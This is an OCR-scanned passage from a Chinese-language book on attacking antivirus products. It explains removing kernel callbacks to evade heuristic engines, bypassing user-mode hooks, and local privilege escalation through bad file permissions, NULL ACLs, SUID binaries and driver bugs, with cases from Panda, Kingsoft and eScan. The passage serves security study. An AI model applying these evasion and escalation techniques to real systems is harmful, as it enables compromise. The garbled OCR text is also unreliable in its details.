(1) 恶意 软件 首先 会 安装 一 个 驱动 或 使 用 内 核 级 的 漏洞 使 其 自身 代码 运行 在 Ring-0 层 。 恶 意 
软件 会 获取 指向 PspcreateProcessNotifyRoutine (未 有 相关 文档 说 明 ) 的 指针 。 

(2) 接着 ， 恶 意 软件 会 移 除 该 程序 所 有 已 经 注册 的 回调 。 

(3) 那些 不 会 被 监控 到 的 真正 的 恶意 程序 就 会 被 执行 。 

但 上 述 操作 过 程 的 首要 前 提 是 , 代码 需要 运行 在 内 核 态 。 否 则 ,相关 代 码 就 无 法 移 除 任何 已 
经 注册 的 回调 。 Daniel Pistelli 在 一 篇 博客 文章 中 提 到 了 移 除 内 核 回 调 的 案例 : http://rcecafe.net/?p= 
l16http://rcecafe.net/?p=116。 

内 核 层 会 有 更 多 被 注册 用 于 监控 电脑 操作 的 hook 或 回调 。 内 核 层 启发 式 引 擎 通常 会 使 用 这 些 
hook。 通 常 ， 文件 系统 或 注册 表 hook 会 监控 ( 也 会 根据 已 经 配置 或 动态 设 定 的 相关 规则 ,拒绝 或 
放行 相关 操作 ) 系统 中 对 应 的 操作 。 这 一 针对 文件 系统 的 监控 过 程 中 ， 通 常会 用 到 mini-filter。 
mini-filter 是 用 于 监控 和 记录 系统 中 的 VO 和 交互 操作 功能 的 内 核 驱动 模块 。 举 例 来 说 ， 这 一 驱动 
模块 可 以 在 文件 真正 打开 、 写 入 或 读 取 前 检查 文件 。 这 里 需要 再 次 说 明 ， 对 于 用 户 态 的 恶意 软件 
程序 来 说 , 刚刚 提 到 的 操作 是 无 法 进行 的 。 但 是 , 借助 内 核 驱动 , 恶意 软件 可 以 进行 比 PASSIVE_ 
LEVEL ( mini-filter 的 工作 层面 ) 更 低 的 底层 操作 ， 比 如 APc_LEVEL ( 异步 程序 调用 ) 或 
DISPATCH, LEVEL ( 延 时 调用 )。 

回 到 hook 注 册 表 操作 上 来 ， 反 病毒 软件 可 以 通过 cmRegistercallback 注 册 一 个 回调 程序 。 
每 当 注 册 表 编辑 器 进行 注册 表 操 作 前 Registrycallback 程 序 就 会 收 到 通知 。 和 上 面 提 到 的 一 
FÉ. ， 用 户 态 程序 无 法 在 用 户 态 来 侦 测 和 绕 过 一 些 需 要 在 内 核 层 进行 的 操作 。 就 像 在 
PsSetcreateProcessNotifyRoutine 案 例 中 冰释 的 那样 ， 恶 意 软 件 或 其 他 任意 一 个 内 核 层 的 
程序 可 以 移 除 回调 ,对 注册 表 进 行 任 意 操 作 ， 完 全 不 受 反 病毒 软件 内 核 防护 驱动 的 影响 (参见 图 
9-3 ), 
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kse “RMp64 FaA64 
IRQL IRQL ReL [IRQL 描述 
值 fü | 值 
PASSIVE_LEVEL 用 户 线程 和 大 多 数 内 核 态 的 
操作 
MC. LEVEL N/A 可 纠正 的 机 器 
( 仅 适 用 于 Intel 安 腾 架 
Device interrupt 3-26 
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机 器 检查 和 灾难 性 错误 ， 适 用 
于 Windows XP 及 之 后 版 本 操 
作 系 统 的 Profiling 定 时 器 


图 9-3”IRQL 列 表 ” 
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本 章 讲述 了 在 用 户 态 、 内 核 态 以 及 混合 态 实现 的 多 种 启发 式 引擎 。 除 了 各 种 启发 式 引 擎 外 ， 

本 章 还 介绍 了 绕 过 这 些 启发 式 侦 测 的 方式 。 

总 的 来 说 ， 本 章 重 点 内 容 如 下 。 

O 反 病毒 产品 中 的 启发 式 引 敬 ， 通 过 评估 由 静态 或 动态 分 析 可 疑 代 码 收集 的 相关 信息 和 程 

序 行为 开展 侦 测 。 

口 静态 启发 式 引 擎 通过 静态 反 汇 编 或 筛选 分 析 文件 头 来 侦 测 发 现 恶意 软件 。 反 病毒 软件 使 
用 的 静态 启发 式 引 擎 可 能 会 用 到 类 似 贝 叶 斯 神经 网 络 、 通 用 算法 或 专家 系统 这 样 的 机 器 
学 习 算 法 。 大 多 数 时 候 ， 静 态 启发 式 引擎 被 认为 是 真正 的 启发 式 引擎 ， 而 动态 分 析 引 擎 
则 又 被 称 为 主机 入 侵 防御 系统 ( HIPS )。 




































































(D Microsoft 官 方 关于 此 部 分 的 技术 文档 地 址 如 下 : http://download.microsoft.com/download/e/b/a/eba/050f-a3/d-436b- 
9281-92cdfeae4b45/IRQL thread.doc。 一 一 译 者 注 
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D 基于 专家 系统 的 启发 式 引 擎 会 使 用 类 似 人 类 病毒 分 析 者 作出 分 析 决 定 过 程 的 算法 。 

口 动态 启发 式 引 擎 通过 hook API 调 用 或 在 模拟 的 框架 环境 下 执行 程序 , 基于 对 文件 或 程序 行 

为 的 分 析 进 行 相关 侦 测 防护 。 

口 动态 启发 式 引擎 通过 hook ( 用 户 态 或 内 核 态 ) 实现 相应 功能 。 动 态 启 发 式 引擎 也 会 依赖 

相关 模拟 功能 ( 这 一 点 和 静态 分 析 一 样 )。 

口 动态 分 析 引 擎 通过 使 用 用 户 态 hook, 监控 相关 API 的 调用 执行 情况 , 并 有 根据 地 对 相关 操 
作 进 行 阻 断 。 这 类 用 户 态 hook 通 常会 借助 类 似 EasyHook 、 微 软 出 品 的 Detours 或 
madCodeHook 等 第 三 方 hooking 库 实现 。 

口 绕 过 用 户 态 hook 十 分 容易 是 方式 多 种 多 样 。 比 如 ， 攻 击 者 可 以 从 硬盘 中 读 取 被 hook 函 数 
的 原生 序言 , 然后 执行 这 些 字 节 码 , 接着 继续 执行 序言 字 节 码 后 的 函数 代码 ( 没有 被 hook 
的 相关 代码 部 分 ), 另 一 个 简单 的 方式 是 , hook E, 这 样 就 可 以 在 印 载 后 移 除 hook 了 了 o 

口 内 核 态 hook 依 赖 于 监控 进程 创建 和 系统 注册 表 操 作 的 注册 回调 。 同 时 ， 内 核 态 hook 也 会 

借助 文件 系统 过 滤 驱 动 来 进行 实时 文件 行为 分 析 。 

口 和 绕 过 用 户 态 hook 一 样 ， 运 行 在 内 核 层 的 恶意 代码 同样 也 可 以 印 载 内 核 层 hook。 

口 第 三 种 启发 式 引 擎 通过 同时 使 用 用 户 态 和 内 核 态 的 hook 实 现 。 

至 此 本 书 第 二 部 分 已 经 结束 ,下 一 部 分 将 会 讨论 如 何 把 握 全 局 , 编写 本 地 或 远程 的 测试 攻击 
代码 ， 并 找到 反 病 毒 软件 中 的 漏洞 ， 然 后 利用 它们 攻击 反 病毒 软件 。 
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软件 的 攻击 面 是 指 , 暴露 在 外 可 以 被 未 授权 用 户 发 现 漏洞 并 加 以 利用 的 攻击 和 人口 点 。 攻 击 面 
可 以 分 成 两 组 : 本 地 攻击 面 和 远程 攻击 面 。 

本 章 将 讨论 如 何 识别 杀毒 软件 的 攻击 面 。 从 某 种 程度 上 说 , 无论 是 哪 一 种 软件 ， 当 我 们 需要 
确定 从 哪里 入 手 针 该 对 目标 软件 开展 攻击 时 , 本 音 所 讨论 的 相关 技术 和 工具 都 可 以 派 上 用 场 。 本 
章 将 介绍 如 何 使 用 操作 系统 的 内 置 工具 和 一 些 专门 工具 帮助 我 们 确定 本 地 和 远程 的 攻击 面 和 攻 
击 技术 ， 进 而 帮助 我 们 了 解 能 够 发 现 漏洞 的 可 能 性 有 和 多大。 
根据 所 分 析 的 组 件 和 目标 操作 系统 的 不 同 ， 我 们 使 用 的 工具 和 技术 也 各 不 相同 。 比 如 在 类 
Unix 操 作 系 统 平台 上 ， 可 以 使 用 Unix 原 生 工 具 集 (ls、find、lsof、netstat 等 )。 在 Windows 操 作 系 
统 平 台 上 ， 则 需要 Sysinternals Suite 和 其 他 一 些 辅助 性 的 第 三 方 工 具 。 

任何 软件 的 攻击 面 都 可 以 分 为 两 个 部 分 : 本 地 和 远程 攻击 面 。 本 地 攻击 面 是 指 可 以 被 本 地 用 
户 利 用 ， 比 如 将 普通 用 户 C 只 有 读 取 和 写 入 对 应 用 户 设 置 或 文档 目录 权限 ) 权限 提升 到 管理 员 用 
户 权 限 。 有 时 本 地 攻击 可 以 用 于 发 起 拒绝 服务 攻击 ( denial ofservice, Dos )， 造 成 软件 行为 异常 
或 消耗 大 量 系统 资源 ， 导 致 机 咒 无 法 使 用 。 男 一 方面 ， 如 果 攻 击 者 能 够 远程 利用 漏洞 ， 在 不 需要 
本 地 访问 机 器 的 情况 下 向 其 发 起 攻击 ,那么 这 个 攻击 面 就 被 称 为 远程 攻击 面 。 比 如 ， 类 似 服务 器 
或 Web 应 用 常会 存在 可 以 供 攻 击 者 利用 并 攻击 的 远程 攻击 面 。 同样 地 , 一 项 监听 客户 端 链接 的 网 
络 服务 可 能 会 存在 缓冲 区 溢出 或 解析 特定 文件 格式 的 漏洞 ( 这 在 反 病 毒 软件 中 十 分 常见 )， 类 似 
这 样 的 漏洞 可 以 通过 发 送 畸 形 的 邮件 来 利用 攻击 。 通 过 利用 类 似 漏洞 ， 可 以 造成 网 络 服务 崩 演 或 
使 得 机 器 消耗 大 量 资 源 。 

一 些 安全 研究 者 认为 通过 局 域 网 (LAN ) 或 内 网 实施 的 远程 攻击 与 通过 广域网 (WAN ) SE 
施 的 远程 攻击 存在 区 别 。 局域网 远程 攻击 只 能 在 内 网 中 实施 ， 比 如 通过 反 病 毒 远程 管理 面板 实施 
攻击 ( 例如， 第 13 章 会 讨论 的 eScan Malware Admin 中 的 漏洞 )。 男 外 有 一 些 服务 经 由 互联 网 被 攻 
击 ， 比 如 之 前 提 到 的 邮件 网 关中 的 漏洞 案例 。 

因为 研究 远程 攻击 面 通常 更 有 趣 , 所 以 许多 人 研究 者 党 把 关注 点 放 在 如 何 远程 利用 反 病 毒 软件 
的 漏洞 发 起 攻击 上 。 但 是 ， 同 时 也 需要 关注 本 地 攻击 面 ， 因 为 如 果 最 终 想 要 完全 控制 目标 机 器 ， 
需要 编写 多 步 又 的 漏洞 利用 程序 。 比 如 ， 首 先 利 用 一 个 远程 漏洞 获取 有 限 的 权限 ( 在 Linux 平 台 
上 ，Apache 以 www-daata 账 户 运 行 ; 在 Windows 服 务 器 平台 上 ， 以 非 管理 员 权限 运行 )。 接着, 使 
用 一 个 本 地 权限 提升 漏洞 获取 最 高 完整 权限 〈 根据 不 同 的 操作 系统 和 漏洞 类 型 ， 可 以 获取 root、 
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本 地 系统 甚至 是 接触 内 核 层 的 权限 )。 不 要 仅仅 把 眼光 局 限于 远程 利用 漏洞 ， 稍 后 ， 我 们 需要 借 
助 一 个 〈 或 多 个 ) 本 地 漏洞 来 编写 一 个 完整 的 远程 root 漏 洞 利 用 攻击 程序 。 如 今 ， 发 现 并 利用 一 
个 反 病 毒 软件 中 的 漏洞 通常 意味 着 , 可 以 立即 获取 到 访问 根 目录 或 本 地 系统 的 权限 ,因为 反 病 毒 
软件 通常 是 使 用 提升 过 的 权限 运行 的 。 

过 去 ,利用 浏览 器 、 文 档 阅读 需 或 其 他 客户 端 应 用 很 容易 就 能 获取 当前 登录 用 户 的 权限 。 如 
果 有 必要 的 话 , 组 合 利用 另 一 个 漏洞 就 可 以 获取 到 访问 根 目 录 和 本 地 系统 的 最 高 权限 。 如 今 ,如 
果 想 要 获取 到 当前 登录 用 户 权限 , 在 利用 客户 端 应 用 的 漏洞 过 程 中 , 还 需要 进行 沙 合 绕 过 , 也 就 
是 说 需要 找到 沙 盒 或 底层 系统 的 bug， 才 能 达到 最 终 目 的 。 在 不 久 的 将 来 ， 安 全 研究 人 员 和 希望 反 
病毒 产品 也 会 带 有 上 述 相关 特性 〈 沙 盒 代码 保护 )， 使 得 绕 过 沙 盒 成 为 获取 系统 最 高 权限 的 过 程 
中 不 可 或 缺 的 一 部 分 。 


10.1 理解 本 地 攻击 面 


正如 之 前 介绍 的 那样 , 本 地 攻击 面 是 指 会 暴露 本 地 机 器 资源 给 攻击 者 访问 的 模块 ,如 本 地 人 硬 
盘 、 存 储 器 、 进 程 ， 等 等 。 要 确定 目标 反 病 毒 软 件 的 哪 一 部 分 暴露 在 外 、 易 受 攻击 ， 你 需要 了 解 
以 下 概念 : 
口 文件 和 目录 的 权限 ; 
O 在 类 Unix 平 台 上 的 SUID 和 SGID ; 
口 针对 程序 和 库 应 用 的 地 址 空间 配置 随机 加 载 保护 ( address space layout randomization , 
ASLR ) 和 数据 执行 保护 (data execution prevention, DEP ) 状态 ; 
口 Windows 对 象 错误 的 权限 设置 ; 
口 逻辑 缺陷 ; 
O 网 络 服务 侦 听 环 回 适配器 (127.0.0.1, ::1 或 本 地 主机 ); 
口 内 核 设备 驱动 。 

尽管 其 他 一 些 对 象 也 可 能 会 被 暴露 ， 但 以 上 列 出 了 反 病 毒 软 件 中 最 常见 的 容易 暴露 的 薄弱 
对 象 。 


10.1.1 查找 文件 和 系统 目录 权限 的 弱点 


虽然 对 于 反 病 毒 软件 来 说 不 是 很 常见 , 但 是 仍 有 一 些 反 病毒 软件 开发 者 忘记 对 程序 路 径 设 置 
权限 保护 ， 或 是 把 一 些 文件 的 权限 设置 得 过 于 开放 。 举 一 个 Unix 平 台 上 的 例子 , 在 非 必需 的 情况 
F, 一 个 SUID 或 SGID 程 序 可 以 被 任意 用 户 执行 调用 ( 相关 内 容 将 会 在 本 章 后 面 讨论 )。 但 是 , 有 
更 多 的 问题 会 影响 文件 和 目录 的 权限 。 比 如 ， 在 反 病 毒 软 件 Panda Global Protection 的 2011~2013 
版 本 中 , 程序 的 安装 目录 对 本 机 所 有 的 用 户 都 设置 了 可 读 写 的 权限 , 因此 任何 一 个 本 地 用 户 都 可 
以 将 可 执行 程序 、 库 文件 和 其 他 文件 写 入 其 安装 目录 。 如 果 需 要 在 Windows 平 台 上 检查 安装 目录 
的 权限 的 话 ， 可 以 使 用 文件 资源 管理 器 或 命令 行 工具 icacls 来 检查 对 应 目录 的 权限 。 

在 Unix 或 Linux 平 台 上 ， 可 以 运行 以 下 指令 : 
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$ 1s -lga /opt/f-secure 

drwxrwxr-x 5 root root 4096 abr 19 21:32 fsaua 
drwxr-xr-x 3 root root 4096 abr 19 21:32 fsav 
drwxrwxr-x 10 root root 4096 abr 19 21:32 fssp 


上 述 命 令 可 以 显示 F-Secure Anti-Virus Linux 版 的 三 个 安装 目录 的 正确 权限 。 可 以 看 到 ， 只 有 
root 用 户 和 用 户 组 有 权限 进行 读 取 、 写 入 和 执行 。 普 通用 户 只 能 够 读 取 目录 内 容 或 执行 目录 中 的 
相关 程序 。 因 此 ， 困 扰 Panda Global Protection 的 能 够 任意 向 安装 目录 写 人 库 文 件 或 可 执行 程序 、 
修改 重要 文件 等 问题 ， 在 F-Secure Anti-Virus Linux 版 中 并 不 存在 。 


10.1.2 ”权限 提升 


在 反 病 毒 软件 中 ， 本 地 权限 提升 问题 十 分 常见 。 一些 易 出 错 的 地 方 包括 : 存在 缺陷 的 内 核 驱 
动 ; 文件 、 目 录 和 访问 控制 列表 的 权限 控制 不 当 ; 已 安装 的 hook 的 缺陷 ,以 及 反 病 毒 软件 中 的 其 
他 缺陷 。 

权限 提升 是 会 导致 整个 系统 被 攻破 的 严重 漏洞 。 特 别 是 对 于 内 核 模 式 的 代码 来 说 , 在 正确 设 
置 对 象 、 文 件 夹 、 文 件 和 ACL 的 同时 ， 加 以 适当 输入 校 验 的 重要 性 不 言 而 喻 。 

着 误 的 文件 权限 设置 

对 于 软件 审计 工程 师 来 说 , 检查 文件 和 文件 夹 错误 的 权限 的 优先 级 应 该 位 列 前 三 。 和 其 他 所 
有 软件 一 样 , 反 病 毒 软件 都 不 可 避免 地 会 出 现 错误 , 而 且 许 多 反 病 毒 软件 都 出 现 过 其 至 到 目前 还 
存在 着 类 似 的 漏洞 。 

截至 目前 已 经 发 现 了 许多 与 文件 权限 错误 设置 相关 的 漏洞 ， 比 如 去 年 在 Panda 反 病毒 软件 中 
发 现 的 漏洞 。 有 时 候 这 类 漏洞 不 单单 是 安装 包产 生 的 问题 , 可 以 通过 更 改 一 个 文件 夹 或 特定 文件 
的 权限 修复 ， 而 是 由 错误 的 存在 缺陷 的 开发 设计 理念 导致 的 。 旧 版 本 的 Panda 反 病毒 软件 允许 普 
通 的 无 权限 用 户 ( 非 管理 员 用 户 ) 更 新 反 病毒 软件 。 反 病毒 厂商 自作 聪明 地 通过 一 个 会 导致 panda 
反 病 毒 程序 安装 目录 可 被 任意 用 户 写 人 的 方式 来 修复 漏洞 ,而 不 是 创建 一 个 以 SYSTEM 用 户 身 份 
运行 的 Windows 服 务 ， 来 和 普通 用 户 执行 的 应 用 程序 交互 。 

由 于 这 项 糟糕 的 设计 缺陷 ， 攻 击 者 可 以 通过 修改 或 调整 一 些 Panda 反 病毒 软件 的 服务 和 模块 
来 获得 权限 提升 ，Panda 反 病毒 一 时 间 收 到 了 大 量 漏洞 报告 。 比 如 ,昵称 为 tarkus 的 用 户 在 
exploit-db.com 上 发 布 了 一 个 安全 建议 公告 ， 标 题 是 “Panda Antivirus 2008 一 一 本 地 权限 提升 漏洞 
利用 ”。 他 报告 的 这 个 漏洞 源 于 Panda 反 病毒 的 安装 包 设置 了 错误 的 文件 权限 。 安 装 包 
将 %ProgramFiles%\Panda Security Panda Antivirus 2008 目 录 设 置 成 了 任何 人 都 可 以 写 人 。 在 其 漏 
洞 证 明代 码 中 ，tarkus 将 反 病 毒 软件 原始 的 pavsrv51.exe 程 序 替 换 成 了 相同 文件 名 的 程序 。 对 于 
Panda 反 病毒 来 说 ， 因 为 任意 用 户 都 有 权限 写 入 这 个 目录 ， 所 以 反 病 毒 软件 的 主要 服务 程序 都 有 
可 能 会 被 恶意 软件 覆盖 掉 。 重 启 机 器 以 后 ， 被 蔚 换 的 恶意 程序 会 以 SYSTEM 权 限 被 执行 。 


10.2 ”错误 的 访问 控制 列表 


在 很 多 情况 下 ,通过 调用 setsecurityDescriptorDACL 启 动 Windows 服 务 进程 并 向 其 传递 
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一 个 NULL 值 的 ACL 会 存在 漏洞 。 这 类 漏洞 缺陷 常见 于 数据 库 管 理 软件 中 〈 过 去 ，IBM 的 DB2 或 
Oracle 的 数据 库 管 理 软件 易 受 这 样 的 攻击 )， 反 病毒 软件 自然 也 存在 类 似 的 漏洞 。 

因为 我 们 发 现 Panda 反 病毒 是 唯一 一 款 存在 这 类 漏洞 的 反 病 毒 软件 ， 所 以 继续 用 它 作为 案例 
进行 探讨 。 在 Panda Global Protection 2010/2011/2012 版 中 ，WebProxyEXE 和 SrvLoad.EXE 两 个 程 
序 被 Panda 反 病毒 的 其 他 服务 以 本 地 系统 权限 调用 执行 。 但 是 由 于 某 些 未 知 的 原因 ， 反 病毒 开发 
工程 师 向 这 几 个 进程 分 配 了 值 为 NULL 的 ACL ， 导 致 任意 本 地 用 户 都 有 权 对 它们 作出 改动 。 一 个 
值 为 NULL 的 ACL 的 进程 可 以 被 任何 其 他 本 地 进程 打开 、 修 改 、 写 人 。 因 此 ， 攻 击 者 可 以 通过 使 
用 createRemoteThreadAPI 向 这 两 个 进程 注入 DLL 来 获取 SYSTEM 权 限 。 

1. 内 核 级 别 的 漏洞 

反 病 毒 软 件 中 另 一 个 容易 出 错 的 地 方 是 内 核 模 块 中 。 每 过 一 段 时 间 , 就 会 有 反 病 毒 软件 被 发 
现存 在 本 地 漏洞 ， 漏 洞 一 般 与 反 病 毒 软 件 的 内 核 驱 动 有 关 。 有 时 内 核 的 漏洞 无 法 深入 利用 ， 比 如 
拒绝 服务 漏洞 ， 但 是 仍然 会 被 攻击 者 用 于 攻击 。 一 般 情况 下 ， 内 核 级 别 的 漏洞 需要 在 本 机 利用 ， 
允许 相关 程序 从 较 低 权限 的 普通 用 户 ， 提 升 到 拥有 内 核 权 限 的 高 级 用 户 。 

发 现 内 核 漏洞 的 重要 性 在 于 , 在 内 核 态 下 攻击 者 可 以 对 系统 作出 任何 改动 ， 比 如 安装 恶意 驱 
动 ， 向 磁盘 直接 做 写 人 操作 来 破坏 其 中 的 内 容 ，hook 用 户 态 进 程 来 窃取 敏感 数据 C 比如 ,窃取 浏 
览 器 访问 银行 网 站 发 送 的 银行 交易 账户 信息 ) nnn 可 以 说 ,这 时 候 恶 意 软 件 可 以 做 任何 事情 。 从 
大 处 着 眼 ， 某 些 操 作 系统 确实 会 阻止 root 或 管理 员 用 户 进行 一 些 敏感 操作 。 但 是 ， 如 果 恶 意 软 件 
能 在 内 核 态 下 运行 ， 这 些 都 将 是 无 用 功 。 

通常 情况 下 ， 这 类 内 核 问 题 是 由 于 对 设备 的 IO 通道 进行 管理 的 函数 (IOCTL ) 没有 正确 校 
验 相 关 传 和 人 值 造成 的 。 内 核 驱动 缺陷 可 以 在 其 他 许多 层级 出 现 ， 比 如 已 安装 的 hook 处 理 咒 。 反 病 
毒 软件 经 常会 在 用 户 态 和 内 核 态 对 常用 文件 IO 函数 安装 hook ( 如 createFile 函 数 )。 针 对 这 类 
函数 的 hook 程 序 必 须 小 心 编写 ， 但 是 开发 者 仍然 会 出 现 错误 。 

让 我 们 来 看 一 个 API hooking 过 程 中 出 现 缺 陷 的 例子 ， 一 位 昵称 为 MJ0011 的 用 户 通过 
exploitdb.com 报 告 了 标题 为 “金山 毒霸 2012 KisKmlsys <= 2011.7.8.913 一 一 本 地 内 核 提 权 漏 洞 ” 
的 漏洞 ， 报 告 中 指出 漏洞 原因 是 错误 的 API hook 处 理 。 金 山 毒 霸 内 核 驱 动 通过 安装 API hook 来 监 
控 被 hook 的 API 的 调用 和 使 用 情况 。KisKrnl.sys 驱 动 没有 校 验 发 送 给 被 hook 的 Windows API 
NtQueryValueK y 的 R sultL ngth 参 数值 。 因此 ， 攻击 者 可 以 构造 任意 ResultLength 值 ， 
内 核 驱 动 会 把 未 经 校 验 的 值 用 于 复制 数据 。MJ0011 公 开 的 漏洞 证 明代 码 在 成 功利 用 驱动 漏洞 后 ， 
将 屏幕 显示 模式 切换 到 了 文本 显示 模式 ， 并 在 系统 真正 月 演 之 前 显示 了 一 段 类 似 于 Microsoft 
Windows 蓝 屏 错误 (blue screen of death, BSOD ) 的 信息 。 

2. 外 部 缺陷 

对 于 一 些 罕见 的 本 地 漏洞 , 我 们 只 需 查 看 反 病毒 产品 的 主要 部 分 并 分 析 其 内 部 设计 架构 即 可 
理解 。 反 病毒 引 敬 通常 包括 一 球 其 至 是 多 款 扫描 右 和 启发 式 检测 引 警 。 但 是 有 一 些 启发 式 引 擎 并 
不 是 由 扫描 器 直接 启动 的 ， 比 如 命令 行 或 GUI 扫描 器 ， 而 是 基于 监控 系统 应 用 的 实时 行为 。 它 们 
和 普通 的 扫描 需 一 样 ， 也 会 出 现 同样 的 问题 : 解析 不 同文 件 格式 过 程 中 出 现 漏洞 。 

让 我 们 来 看 Arash Allebrahim 在 exploit-db.com 上 报告 的 一 个 名 为 “QuickHeal AntiVirus 



































































































































148 第 10 章 确定 攻击 面 





7.0.0.1 一 一 栈 溢 出 漏洞 ”的 漏洞 案例 。 该 漏洞 是 一 个 反 病 毒 软 件 的 某 分 析 模 块 注 入 运行 进程 时 发 
生 的 栈 溢出 问题 。 在 报告 者 提交 的 PoC 中 ， 他 向 Internet Explorer 注 入 一 个 亚 意 DLL ( 通过 操作 导 
AR), 当 经 由 实时 启发 式 引擎 分 析 时 , PE 文件 中 导入 的 超 长 文件 名 便 会 造成 典型 的 Unicode 栈 洲 
出 漏洞 。 该 漏洞 只 在 DLL 文件 被 注入 的 时 候 才 会 被 触发 。 


10.2.1 在 Unix 平 台 上 利用 SUID 和 SGID 二 进 制 文件 漏洞 


在 类 似 Solaris 、FreeBSD 和 Linux 这 样 的 类 Unix 系 统 平台 上 ，SUID 和 SGID 被 应 用 于 可 执行 文 
件 上 。 有 SUID 或 SGID 相 关 标 记 的 程序 必须 以 所 有 用 户 或 所 有 用 户 组 权限 执行 。 我 们 可 以 通过 以 
下 指令 搜索 带 有 相关 标记 的 文件 : 


$ find /directory -perm «4000 # For SUID files 
$ find /directory -perm «8000 # For SGID files 


如 果 使 用 类 似 上 面 的 命令 来 查找 DrWeb 安 装 目录 下 的 SUID 应 用 程序 ， 会 得 到 如 下 结果 : 
$ find /opt/drweb/ -perm +4000 


/opt/drweb/lib/drweb-spider/libdw notify.so 
/opt/drweb/drweb-escan.real 


搜索 结果 显示 有 两 个 SUID 二 进 制 文件 : libdw_notify.so 和 drweb-escan.real。 但 是 这 两 个 二 进 
制 文 件 的 权限 被 设置 得 十 分 严格 : 只 有 root 用 户 或 drweb 用 户 组 才 可 以 执行 二 进 制 文件 , 我 们 可 以 
通过 1s 命 令 进 行 确认 : 















































$ ls -1 /opt/drweb/drweb-escan.real 
-rwsr-x--- 1 root drweb 223824 oct 22 2013 /opt/drweb/drweb-escan.real 


带 有 SUID 或 SGID 标 识 的 程序 很 容易 出 现 权 限 提 升 漏 洞 。 如 果 在 编写 过 程 中 稍 不 留意 ， 或 者 
本 来 只 能 被 特定 用 户 或 用 户 组 使 用 却 错误 地 给 所 有 用 户 执行 权限 , 这 样 系统 中 的 任意 用 户 就 都 能 
以 所 有 者 权限 执行 程序 。 如 果 SUID 或 SGID 程 序 的 所 有 者 是 root 用 户 呢 ? 相信 你 已 经 猜 到 了 : x 
击 者 可 以 获取 root 权 限 。 

在 eScan Malware Admin 真 实 的 漏洞 案例 中 ， 尽 管 表面 上 确实 是 SUID 二 进 制 文件 没有 分 配 正 
确 的 权限 ,但 是 该 漏洞 暴露 的 次 层 问 题 是 开发 设计 理念 存在 的 缺陷 。 该 款 Web 管 理应 用 被 用 于 管 
理 eScan 反 病毒 软件 的 安装 ， 其 开发 设计 理念 是 无 论 web 应 用 的 终端 用 户 输入 什么 命令 ， 都 会 以 
root 权 限 执行 该 命令 (十 分 糟糕 的 开发 设计 理念 )。 由 于 Web 应 用 是 无 法 直接 以 root 权 限 执行 命令 
的 ， 以 及 另 一 个 设计 缺陷 ，Web 应 用 需要 以 root 权 限 执 行 任务 ; 开发 者 通过 创建 了 一 个 名 为 
/opt/MicroWorld/sbin/runasroot 的 SUID 二 进 制 文件 ,接受 来 自 Web 应 用 的 输入 值 ， 以 为 这 样 就 可 以 
“修复 ”漏洞 了 。 其 实 这 是 一 个 非常 糟糕 的 决定 ， 因 为 这 项 “修复 ”措施 会 带 来 很 多 问题 ， 尤 其 
当 Web 应 用 本 身 存在 漏洞 的 时 候 。 远 程 攻 击 者 可 以 首先 获取 用 户 mwadmin 的 权限 ( 运行 Web 应 用 
的 用 户 权 限 )。 接 着 ， 由 于 用 户 mwadmin 可 以 执行 该 二 进 制 文件 ， 远 程 攻 击 者 可 以 通过 运行 
runasroot 在 目标 机 器 上 获取 root 权 限 。 

因此 ， 本 例 中 的 bug 并 不 仅仅 是 一 个 权限 问题 ， 而 是 一 个 由 错误 开发 设计 理念 导致 的 漏洞 。 
事实 上 ， 由 于 进行 权限 筛选 时 不 仔细 ， 这 一 错误 的 开发 设计 理念 造成 了 很 多 漏洞 。 确 实 ， 这 类 漏 
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洞 往 往 比 较 难 以 修复 ， 因 为 这 将 意味 着 要 改变 软件 的 开发 设计 。 
10.2.2 ”程序 和 二 进 制 文件 的 ASLR 和 DEP 保护 


近年 来 ， 操 作 系统 中 启用 了 ASLR 和 DEP 漏 洞 缓 释 保 护 。ASLR 意 味 着 程序 和 库 的 地 址 空间 
是 随机 的 ， 而 不 是 可 预测 的 (在 可 执行 文件 头 中 规定 或 设 定 基 础 加 载 地 址 )。 这 就 使 得 攻击 者 难 
以 猜测 到 完成 漏洞 利用 攻击 所 需要 用 到 的 代码 和 数据 区 块 在 缓冲 区 中 的 正确 地 址 或 偏 移 量 。 在 
一 些 操作 系统 中 ， 例 如 Mac OS X 和 Linux ， 系 统 会 强制 所 有 程序 和 库 应 用 ASLR 保 护 〈 可 能 不 同 
内 核 间 有 一 些 细 微 的 区 别 )。 但 在 Windows 平 台 上 ， 只 有 在 程序 开发 的 过 程 中 启用 了 ASLR 保 护 
才 会 生效 。 从 2002 年 开始 ， 使 用 Microsoft Visual Studio 编 译 C 或 C++ 程序 会 默认 选择 启用 ASLR. 
防护 。 但 是 有 些 旧 程序 由 旧版 本 编译 器 生成 ,或 者 它们 的 开发 者 有 意 要 禁用 ASLR ( 很 多 时 候 是 
考虑 到 性 能 消耗 原因 ， 尽 管 大 多 数 时候 禁 用 ASLR 的 变化 不 大 )。 尽 管 禁用 对 主 进程 或 库 禁 用 
ASLR 防 护 不 能 被 认为 是 一 个 漏洞 , 但 是 从 攻击 者 的 角度 来 说 , 这 会 帮助 他 们 判断 内 存 破 坏 漏洞 
的 利用 难度 。 

DEP 是 用 来 避免 内 存 页 面 在 程序 执行 过 程 中 被 直接 标记 为 可 执行 的 防护 技术 。 任何 试图 执行 
类 似 数据 页 面 的 操作 最 终 都 会 抛 出 一 个 错误 。 正 确 安全 的 做 法 是 给 内 存 页 读 和 写 或 读 和 执行 权 
限 ， 而 不 是 读 、 写 以 及 执行 权限 。 和 ASLR 一 样 ， 如 果 程 序 没有 加 上 数据 执行 保护 ， 就 意味 着 有 
漏洞 。 但 是 ， 相 较 于 ASLR 没 有 启用 来 说 ， 没 有 启用 DEP 会 更 好 利用 。 在 数据 执行 保护 技术 出 现 
之 前 ,一 个 栈 溢 出 会 直接 导致 代码 执行 。 

在 Windows 系 统 平台 上 ， 可 以 使 用 Sysinternals Suite 里 的 Process Explorer ( 程序 名 称 为 
procexp .exe ) 来 校 验 当前 进程 或 模块 的 ASLR 和 DEP 防 护 状态 。 

图 10-1 显 示 了 Bitdefender Security Service 实 时 防护 进程 启用 了 DEP ( 进程 列表 中 的 第 8 列 )。 
但 是 ,无 论 是 主 服 务 进程 ( vsserv.exe ) 还 是 大 多 数 库 文 件 都 没有 启用 ASLR ( 子 进 程 列 表 中 的 第 
五 个 )。 这 让 攻击 者 可 以 使 用 这 些 库 中 的 任意 代码 或 一 系列 符合 特定 格式 的 硬 编码 的 偏 移 量 来 编 
